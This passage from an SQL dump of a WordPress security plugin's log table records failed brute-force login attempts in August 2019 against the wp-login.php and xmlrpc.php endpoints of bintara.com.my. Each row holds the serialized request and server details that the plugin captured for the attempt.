22:01:03',18199600,19495232,'https://bintara.com.my/xmlrpc.php',1,0,'5.196.23.137'),(23323,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.142.36\";s:11:\"REMOTE_PORT\";s:5:\"60945\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRa32XkG1atThADMYGQ9gAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566857951.2154\";s:12:\"REQUEST_TIME\";s:10:\"1566857951\";}}','notice','2019-08-26 22:19:12','2019-08-26 22:19:11',17684552,19175296,'https://bintara.com.my/wp-login.php',1,0,'104.236.142.36'),(23324,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.142.36\";s:11:\"REMOTE_PORT\";s:5:\"61446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRa4hTEVi0fEJEHuDZjYAAAABE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566857954.6553\";s:12:\"REQUEST_TIME\";s:10:\"1566857954\";}}','notice','2019-08-26 22:19:16','2019-08-26 22:19:15',18200416,19497520,'https://bintara.com.my/xmlrpc.php',1,0,'104.236.142.36'),(23325,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.138.22.204\";s:11:\"REMOTE_PORT\";s:5:\"39750\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRdLoir4pgxiIHnHK4riAAAAc0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566858542.6412\";s:12:\"REQUEST_TIME\";s:10:\"1566858542\";}}','notice','2019-08-26 22:29:03','2019-08-26 22:29:02',17682336,19173888,'https://bintara.com.my/wp-login.php',1,0,'164.138.22.204'),(23326,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"52.237.132.31\";s:11:\"REMOTE_PORT\";s:5:\"59026\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRhFR90bn5mtr-PXqq9aQAAAEY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566859541.3625\";s:12:\"REQUEST_TIME\";s:10:\"1566859541\";}}','notice','2019-08-26 22:45:42','2019-08-26 22:45:41',17683112,19173920,'https://bintara.com.my/wp-login.php',1,0,'52.237.132.31'),(23327,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.75.186\";s:11:\"REMOTE_PORT\";s:5:\"41817\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRjEQ0@TGWC-1tzGX5ijQAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566860049.8896\";s:12:\"REQUEST_TIME\";s:10:\"1566860049\";}}','notice','2019-08-26 22:54:11','2019-08-26 22:54:10',17683248,19174136,'https://bintara.com.my/wp-login.php',1,0,'104.236.75.186'),(23328,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"165.227.4.40\";s:11:\"REMOTE_PORT\";s:5:\"33208\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRneR90bn5mtr-PXqrAIwAAAFU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566861177.7708\";s:12:\"REQUEST_TIME\";s:10:\"1566861177\";}}','notice','2019-08-26 23:12:59','2019-08-26 23:12:58',17687384,19178528,'https://bintara.com.my/wp-login.php',1,0,'165.227.4.40'),(23329,0,'brute_force','invalid-login::username-dexter','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:6:\"dexter\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"474\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"165.227.4.40\";s:11:\"REMOTE_PORT\";s:5:\"33406\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRnfA0@TGWC-1tzGX5jEQAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566861180.6321\";s:12:\"REQUEST_TIME\";s:10:\"1566861180\";}}','notice','2019-08-26 23:13:02','2019-08-26 23:13:01',18199736,19497008,'https://bintara.com.my/xmlrpc.php',1,0,'165.227.4.40'),(23330,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"140.127.218.200\";s:11:\"REMOTE_PORT\";s:5:\"54702\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRvA2XkG1atThADMYGSTgAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566863107.5333\";s:12:\"REQUEST_TIME\";s:10:\"1566863107\";}}','notice','2019-08-26 23:45:08','2019-08-26 23:45:07',17685408,19175696,'https://bintara.com.my/wp-login.php',1,0,'140.127.218.200'),(23331,0,'brute_force','invalid-login::username-demo','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"demo\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"140.127.218.200\";s:11:\"REMOTE_PORT\";s:5:\"55070\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRvBh90bn5mtr-PXqrDRgAAAEE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566863110.3826\";s:12:\"REQUEST_TIME\";s:10:\"1566863110\";}}','notice','2019-08-26 23:45:11','2019-08-26 